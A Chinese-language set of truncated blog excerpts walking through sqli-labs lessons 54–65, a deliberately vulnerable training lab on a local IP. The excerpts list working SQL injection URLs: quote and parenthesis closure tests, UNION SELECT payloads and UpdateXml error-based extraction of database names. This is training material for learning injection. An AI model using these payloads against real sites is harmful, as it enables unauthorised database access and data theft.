单引号闭合成功,但是union select结果不对 http://192.168.136.128/sqli-labs-master/Less-58/?id=0' union select 1,2,3%23 id='0'是不出结果的,那数据就不是从数据库取出的 http://192.168.136.128/sqli-labs-master/Less-58/?id=1' 但是有MYSQL的报错 那就用报错取数据 http://192.168.136.128/sqli-labs-master/Les…

http://192.168.136.128/sqli-labs-master/Less-61/?id=1' 单引号双括号闭合 192.168.136.128/sqli-labs-master/Less-61/?id=1')) or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23…

http://192.168.136.128/sqli-labs-master/Less-60/?id=1")%23 http://192.168.136.128/sqli-labs-master/Less-60/?id=0") or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23…

整型的注入 http://192.168.136.128/sqli-labs-master/Less-59/?id=1 or UpdateXml(1,concat(0x7e,database(),0x7e),1)%23…

允许130次尝试,然后是个盲注漏洞,看来要单字符猜解了 加单引号,页面异常,但报错被屏蔽了 http://192.168.136.128/sqli-labs-master/Less-62/?id=1' 加注释符,说明不止是用单引号闭合 http://192.168.136.128/sqli-labs-master/Less-62/?id=1'%23 加单括号,页面恢复正常 http://192.168.136.128/sqli-labs-master/Less-62/?id=1')%23 猜解数…

双引号括号闭合 http://192.168.136.128/sqli-labs-master/Less-65/?id=1")%23…

双括号整型 http://192.168.136.128/sqli-labs-master/Less-64/?id=1)) or ((1…

引号闭合 http://192.168.136.128/sqli-labs-master/Less-63/?id=1' or '1'='1 剩下的和Less62一样…

http://192.168.136.128/sqli-labs-master/Less-55/?id=1' 试了几次,整型带括号正常了 http://192.168.136.128/sqli-labs-master/Less-55/?id=1)%23 http://192.168.136.128/sqli-labs-master/Less-55/?id=0) union select 1,user(),database()%23 http://192.168.136.128/sqli-labs…

尝试的次数只有10次 http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1' 单引号报错,错误信息没有显示 加注释符页面恢复正常,判断为单引号闭合 http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'%23 通过页面信息可以判断查询的表至少有id,username,password三个字段,所以union select至少应该select3个字段 ht…